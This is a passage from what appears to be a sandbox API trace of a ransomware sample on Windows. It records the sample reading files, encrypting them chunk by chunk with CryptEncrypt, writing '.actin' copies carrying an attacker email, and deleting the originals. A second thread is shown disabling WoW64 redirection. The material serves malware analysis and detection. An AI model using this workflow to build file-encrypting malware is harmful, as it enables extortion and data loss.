Office\\root\\Office16\\ACCWIZ\\ACWZTOOL.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwztool.accde"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0048.093] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x352fb00 | out: lpFileSize=0x352fb00*=11493376) returned 1 [0048.093] CloseHandle (hObject=0x344) returned 1 [0048.093] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZTOOL.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwztool.accde")) returned 0x220 [0048.093] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZTOOL.ACCDE.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwztool.accde.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0048.093] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZTOOL.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwztool.accde"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0048.093] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x352faa0 | out: lpNewFilePointer=0x0) returned 1 [0048.093] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x352faa0 | out: lpNewFilePointer=0x0) returned 1 [0048.093] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZTOOL.ACCDE.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwztool.accde.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0048.093] CryptImportKey (in: hProv=0xf466e8, pbData=0x352fa58, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x352fab4 | out: phKey=0x352fab4*=0xf71d00) returned 1 [0048.093] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x352fb68, dwFlags=0x0) returned 1 [0048.093] ReadFile (in: hFile=0x344, lpBuffer=0x38fc020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x352fadc, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesRead=0x352fadc*=0x110100, lpOverlapped=0x0) returned 1 [0048.230] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100, dwBufLen=0x110100 | out: pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100) returned 1 [0048.245] WriteFile (in: hFile=0x324, lpBuffer=0x38fc020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x352fac0, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesWritten=0x352fac0*=0x110100, lpOverlapped=0x0) returned 1 [0048.802] ReadFile (in: hFile=0x344, lpBuffer=0x38fc020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x352fadc, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesRead=0x352fadc*=0x110100, lpOverlapped=0x0) returned 1 [0048.821] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100, dwBufLen=0x110100 | out: pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100) returned 1 [0048.823] WriteFile (in: hFile=0x324, lpBuffer=0x38fc020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x352fac0, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesWritten=0x352fac0*=0x110100, lpOverlapped=0x0) returned 1 [0049.347] ReadFile (in: hFile=0x344, lpBuffer=0x38fc020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x352fadc, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesRead=0x352fadc*=0x110100, lpOverlapped=0x0) returned 1 [0049.404] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100, dwBufLen=0x110100 | out: pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100) returned 1 [0049.405] WriteFile (in: hFile=0x324, lpBuffer=0x38fc020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x352fac0, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesWritten=0x352fac0*=0x110100, lpOverlapped=0x0) returned 1 [0049.425] ReadFile (in: hFile=0x344, lpBuffer=0x38fc020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x352fadc, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesRead=0x352fadc*=0x110100, lpOverlapped=0x0) returned 1 [0049.693] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100, dwBufLen=0x110100 | out: pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100) returned 1 [0049.694] WriteFile (in: hFile=0x324, lpBuffer=0x38fc020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x352fac0, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesWritten=0x352fac0*=0x110100, lpOverlapped=0x0) returned 1 [0049.896] ReadFile (in: hFile=0x344, lpBuffer=0x38fc020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x352fadc, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesRead=0x352fadc*=0x110100, lpOverlapped=0x0) returned 1 [0049.906] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100, dwBufLen=0x110100 | out: pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100) returned 1 [0049.907] WriteFile (in: hFile=0x324, lpBuffer=0x38fc020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x352fac0, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesWritten=0x352fac0*=0x110100, lpOverlapped=0x0) returned 1 [0050.170] ReadFile (in: hFile=0x344, lpBuffer=0x38fc020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x352fadc, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesRead=0x352fadc*=0x110100, lpOverlapped=0x0) returned 1 [0050.195] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100, dwBufLen=0x110100 | out: pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100) returned 1 [0050.196] WriteFile (in: hFile=0x324, lpBuffer=0x38fc020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x352fac0, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesWritten=0x352fac0*=0x110100, lpOverlapped=0x0) returned 1 [0050.691] ReadFile (in: hFile=0x344, lpBuffer=0x38fc020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x352fadc, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesRead=0x352fadc*=0x110100, lpOverlapped=0x0) returned 1 [0050.702] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100, dwBufLen=0x110100 | out: pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100) returned 1 [0050.703] WriteFile (in: hFile=0x324, lpBuffer=0x38fc020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x352fac0, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesWritten=0x352fac0*=0x110100, lpOverlapped=0x0) returned 1 [0050.772] ReadFile (in: hFile=0x344, lpBuffer=0x38fc020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x352fadc, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesRead=0x352fadc*=0x110100, lpOverlapped=0x0) returned 1 [0051.193] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100, dwBufLen=0x110100 | out: pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100) returned 1 [0051.194] WriteFile (in: hFile=0x324, lpBuffer=0x38fc020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x352fac0, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesWritten=0x352fac0*=0x110100, lpOverlapped=0x0) returned 1 [0051.486] ReadFile (in: hFile=0x344, lpBuffer=0x38fc020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x352fadc, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesRead=0x352fadc*=0x110100, lpOverlapped=0x0) returned 1 [0051.523] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100, dwBufLen=0x110100 | out: pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100) returned 1 [0051.524] WriteFile (in: hFile=0x324, lpBuffer=0x38fc020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x352fac0, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesWritten=0x352fac0*=0x110100, lpOverlapped=0x0) returned 1 [0051.967] ReadFile (in: hFile=0x344, lpBuffer=0x38fc020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x352fadc, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesRead=0x352fadc*=0x110100, lpOverlapped=0x0) returned 1 [0051.977] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100, dwBufLen=0x110100 | out: pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x110100) returned 1 [0051.978] WriteFile (in: hFile=0x324, lpBuffer=0x38fc020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x352fac0, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesWritten=0x352fac0*=0x110100, lpOverlapped=0x0) returned 1 [0052.647] ReadFile (in: hFile=0x344, lpBuffer=0x38fc020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x352fadc, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesRead=0x352fadc*=0x55600, lpOverlapped=0x0) returned 1 [0052.648] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x55610, dwBufLen=0x55610 | out: pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x55610) returned 1 [0052.649] WriteFile (in: hFile=0x324, lpBuffer=0x38fc020*, nNumberOfBytesToWrite=0x55610, lpNumberOfBytesWritten=0x352fac0, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesWritten=0x352fac0*=0x55610, lpOverlapped=0x0) returned 1 [0052.655] CryptImportKey (in: hProv=0xf466e8, pbData=0x352fa4c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x352fab8 | out: phKey=0x352fab8*=0xf71fc0) returned 1 [0052.655] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x352fb68, dwFlags=0x0) returned 1 [0052.655] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x40, dwBufLen=0x40 | out: pbData=0x38fc020*, pdwDataLen=0x352fa78*=0x40) returned 1 [0052.655] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0052.655] WriteFile (in: hFile=0x324, lpBuffer=0x38fc020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x352fac0, lpOverlapped=0x0 | out: lpBuffer=0x38fc020*, lpNumberOfBytesWritten=0x352fac0*=0xf2, lpOverlapped=0x0) returned 1 [0052.655] CryptDestroyKey (hKey=0xf71d00) returned 1 [0052.655] CloseHandle (hObject=0x344) returned 1 [0052.655] CloseHandle (hObject=0x324) returned 1 [0056.056] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ACCWIZ\\ACWZTOOL.ACCDE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\accwiz\\acwztool.accde")) returned 1 [0056.403] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x352fb68 | out: pbBuffer=0x352fb68) returned 1 [0056.403] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingsports_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0056.404] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x352fb00 | out: lpFileSize=0x352fb00*=146432) returned 1 [0056.404] CloseHandle (hObject=0x300) returned 1 [0056.404] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingsports_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite")) returned 0x20 [0056.404] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\windowsapps\\microsoft.bingsports_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0056.404] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingSports_4.6.169.0_x86__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingsports_4.6.169.0_x86__8wekyb3d8bbwe\\configuration\\configuration.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.666] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x352fb68 | out: pbBuffer=0x352fb68) returned 1 [0056.666] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingweather_4.18.56.0_x64__8wekyb3d8bbwe\\configuration\\configuration.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0056.669] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x352fb00 | out: lpFileSize=0x352fb00*=147456) returned 1 [0056.669] CloseHandle (hObject=0x2e4) returned 1 [0056.670] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingweather_4.18.56.0_x64__8wekyb3d8bbwe\\configuration\\configuration.sqlite")) returned 0x20 [0056.670] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\\Configuration\\configuration.sqlite.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\windowsapps\\microsoft.bingweather_4.18.56.0_x64__8wekyb3d8bbwe\\configuration\\configuration.sqlite.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0056.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\WindowsApps\\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\\Configuration\\configuration.sqlite" (normalized: "c:\\program files\\windowsapps\\microsoft.bingweather_4.18.56.0_x64__8wekyb3d8bbwe\\configuration\\configuration.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff Thread: id = 32 os_tid = 0xaec [0045.138] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x33702a8 [0045.138] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x10000) returned 0x33802b0 [0045.139] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x28) returned 0x2a6a420 [0045.139] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x110102) returned 0x3a1c020 [0045.141] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x50) returned 0x2a6a450 [0045.141] CryptImportKey (in: hProv=0xf466e8, pbData=0x366fde0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x366fe48 | out: phKey=0x366fe48*=0xf590a8) returned 1 [0045.141] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x366fe30, dwFlags=0x0) returned 1 [0045.141] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a450, pdwDataLen=0x366fdfc | out: pbData=0x2a6a450, pdwDataLen=0x366fdfc) returned 1 [0045.141] CryptDestroyKey (hKey=0xf590a8) returned 1 [0045.141] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75e90000 [0045.141] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0045.142] Wow64DisableWow64FsRedirection (in: OldValue=0x366fe98 | out: OldValue=0x366fe98*=0x0) returned 1 [0045.142] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a450 | out: hHeap=0x2a60000) returned 1 [0045.142] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.142] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.142] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.142] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.142] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.142] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.142] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.142] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.142] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.142] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.142] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.142] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.143] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.143] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.143] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.143] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.143] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.143] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.143] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.143] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.143] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.143] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.143] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.143] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.143] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.144] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.144] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.144] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.144] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.144] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.144] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.144] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.144] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.144] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.144] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.144] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.144] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.144] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.144] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.145] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.145] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.145] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.145] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.145] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.145] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.145] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.145] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.145] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.145] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.145] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.145] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.145] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.146] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.146] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.146] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.146] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.146] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.146] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.146] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.146] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.146] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.146] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.146] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.146] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.146] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.147] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.147] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.147] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.147] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.147] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.147] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.147] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.147] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.147] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.147] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.147] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.147] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.147] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.148] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.148] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.148] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.148] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.148] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.148] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.148] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.148] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.148] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.148] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.148] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.148] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.148] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.149] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.149] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.149] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.149] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.149] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.149] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.149] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.149] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.149] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.149] WaitForSingleObject (hHandle=0x2d0, dwMilliseconds=0xffffffff) returned 0x0 [0045.149] 